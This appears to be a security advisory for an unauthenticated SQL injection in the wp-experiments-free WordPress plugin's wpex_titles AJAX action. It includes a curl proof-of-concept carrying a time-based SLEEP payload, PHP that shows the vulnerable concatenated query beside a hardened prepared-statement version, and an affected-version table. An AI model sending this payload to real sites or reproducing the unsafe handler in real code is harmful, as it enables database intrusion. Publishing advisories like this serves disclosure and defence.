The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(5)))je)'
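As an added illustration (not the plugin's code, which is not reproduced here), the unsafe pattern the advisory describes beside a hardened handler for the same AJAX action; the function names, the table queried and the exact statement are assumptions.

```php
<?php
// Added illustration, not the plugin's code: a hypothetical wpex_titles AJAX
// handler that builds SQL from the request-controlled `id` array, beside a
// hardened version. Function names, table and query are assumptions.

// Vulnerable pattern: values from $_POST['id'] are concatenated into the
// statement, so "1 AND (SELECT ...)" becomes part of the query text.
function wpex_titles_unsafe() {
    global $wpdb;
    $ids = isset( $_POST['id'] ) ? (array) $_POST['id'] : array();
    $in  = implode( ',', $ids );   // no casting, no escaping
    $sql = "SELECT ID, post_title FROM {$wpdb->posts} WHERE ID IN ({$in})";
    wp_send_json( $wpdb->get_results( $sql ) );
}

// Hardened pattern: every id is forced to a non-negative integer, empty
// input is rejected, and the query is built with one %d placeholder per
// value through $wpdb->prepare(), so request data cannot alter the SQL.
function wpex_titles_safe() {
    global $wpdb;
    $raw = isset( $_POST['id'] ) ? (array) wp_unslash( $_POST['id'] ) : array();
    $ids = array_values( array_filter( array_map( 'absint', $raw ) ) ); // drop 0 / non-numeric
    if ( empty( $ids ) ) {
        wp_send_json_error( 'invalid id', 400 );
    }
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE ID IN ({$placeholders})",
        $ids
    );
    wp_send_json( $wpdb->get_results( $sql ) );
}

// Registering both hooks matches the unauthenticated exposure in the
// advisory; the nopriv hook is what makes the handler reachable anonymously.
add_action( 'wp_ajax_wpex_titles',        'wpex_titles_safe' );
add_action( 'wp_ajax_nopriv_wpex_titles', 'wpex_titles_safe' );
```

With the hardened handler, the time-based payload in the PoC above is reduced to the integer 1 by absint() and the SLEEP() subquery never reaches MySQL.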
| CPE | Name | Operator | Version |
|---|---|---|---|
| | wp-experiments-free | lt | 9.0.1 |